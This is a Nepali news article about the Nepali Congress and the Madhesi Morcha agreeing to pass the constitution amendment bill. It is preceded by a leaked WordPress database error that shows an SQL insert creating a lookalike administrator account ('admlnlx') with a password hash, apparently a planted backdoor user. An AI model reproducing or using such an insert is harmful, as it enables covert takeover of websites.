WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMCA1SYPVxywGqTkeb1CGZ1R7zJgQX1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 01:47:29', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २३ –
प्रमुख विपक्षी दल एमालेले संविधान संशोधन विधेयकको जोडदार रुपमा विरोध गरिरहेका बेला नेपाली कांग्रेस र संयुक्त लोकतान्त्रिक मधेसी मोर्चाले विधेयकलाई छिटोभन्दा छिटो पारित गराउन आ–आफ्नो तर्फबाट भूमिका खेल्ने सहमति गरेका छन् ।
काठमाडौंको बुढानिलकण्ठमा आइतबार कांग्रेस र मधेसी मोर्चाका शीर्ष नेताहरूको बैठकमा संविधान संशोधनको विधेयकलाई परिमार्जनसहित अगाडि बढाउने सहमति भएको सद्भावना पार्टीका महासचिव मनीषकुमार सुमनले जानकारी दिए । ‘संशोधन विधेयकलाई आ–आफ्नो तर्फबाट पारित गराउन भूमिका खेल्ने सहमति भएको छ’, महासचिव सुमनले भने, ‘बरु परिमार्जनका विषयहरूलाई सहमतिका साथ अगाडि ल्याउनुपर्नेमा पनि कुराकानी भएको छ ।’
कांग्रेससँगको बैठकमा खुलेर प्रस्तुत भएको मधेसी मोर्चाले अब संशोधन विधेयकलाई पारित गरेर निर्वाचनमा जान आफू तयार रहेको संकेत दिएको थियो । ‘संशोधन विधेयक पारित भयो भने मधेसी मोर्चा निर्वाचनमा जान तयार छ’, सद्भावना पार्टीका महासचिव सुमनले भने, ‘विर्चान भनेर मधेसी मोर्चालाई अलमल्याउने प्रयास भयो भने हामी मान्दैनौँ ।’
बैठकमा कांग्रेस सभापति शेरबहादुर देउवाले मधेसी मोर्चाको मागप्रति आफूहरू इमान्दार रहेको बताएका थिए । ‘मधेसी मोर्चाको मागलाई पूरा गर्नुपर्छ’, देउवाको भनाइ उदृत गर्दै सुमनले भने, ‘पहिला संविधान संशोधन विधेयक पारित हुन्छ । त्यसपछि चुनावमा जानुपर्छ । मधेसी मोर्चाले पनि साथ दिनुपर्छ ।’
बुढानिलकण्ठको बैठकमा कांग्रेस सभापति शेरबहादुर देउवा, महामन्त्री डा.शशांक कोइराला, कोषाध्यक्ष सीतादेवी यादव, प्रकाशमान सिंह, विमलेन्द्र निधि र कृष्णप्रसाद सिटौला तथा मधेसी मोर्चाबाट महन्थ ठाकुर, लक्ष्मणलाल कर्ण, मनीषकुमार सुमन, केशव झा, अशोक राई, राजेन्द्र श्रेष्ठलगायतका नेताहरूको सहभागिता रहेको थियो ।